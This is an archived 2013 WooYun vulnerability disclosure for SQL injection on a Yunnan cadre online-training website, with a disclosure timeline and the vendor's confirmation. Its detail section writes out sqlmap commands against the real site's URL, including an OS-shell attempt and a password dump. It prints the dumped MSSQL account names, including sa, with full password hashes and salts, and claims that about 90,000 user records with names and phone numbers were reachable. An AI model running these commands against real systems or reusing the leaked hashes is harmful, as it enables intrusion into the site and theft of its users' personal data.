当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-041483

漏洞标题:某干部培训站点#SQL注入至大量用户信息泄露

相关厂商:中共云南省委组织部

漏洞作者: 爱上平顶山

提交时间:2013-10-30 16:44

修复时间:2013-12-14 16:45

公开时间:2013-12-14 16:45

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-30: 细节已通知厂商并且等待厂商处理中
2013-11-03: 厂商已经确认,细节仅向厂商公开
2013-11-13: 细节向核心白帽子及相关领域专家公开
2013-11-23: 细节向普通白帽子公开
2013-12-03: 细节向实习白帽子公开
2013-12-14: 细节向公众公开

简要描述:

0.0

详细说明:

网站名称:云南省干部在线学习学院
网站首页地址:www.yngbzx.cn
主办单位名称:云南广播电视大学
主办单位性质:事业单位
ok
sqlmap.exe -u "http://www.yngbzx.cn/Article/ArticleDetaileNews.aspx?type=1" -v 1 --os-shell
sqlmap.exe -u "http://www.yngbzx.cn/Article/ArticleDetaileNews.aspx?type=1" -v 1 --passwords -v 0
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] distributor_admin
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01008f02f6746f4f532f1a18f1e2a7cedc4fb4eb750424483250
header: 0x0100
salt: 8f02f674
mixedcase: 6f4f532f1a18f1e2a7cedc4fb4eb750424483250
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] distributor_admin [1]:
password hash: 0x0100568582d243cc53c1e30bc75985b5b86b1dae8ce7c9422480
header: 0x0100
salt: 568582d2
mixedcase: 43cc53c1e30bc75985b5b86b1dae8ce7c9422480
[*] sa [1]:
password hash: 0x010056049b0ed69410ac2365ea1fb7c4be0236b2ef1d3316d630
header: 0x0100
salt: 56049b0e
mixedcase: d69410ac2365ea1fb7c4be0236b2ef1d3316d630
上图: 9万多用户 ID 姓名 电话等

0.png


1.png


ok

漏洞证明:

如上

修复方案:

过滤。

版权声明:转载请注明来源 爱上平顶山@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-11-03 20:20

厂商回复:

最新状态:

暂无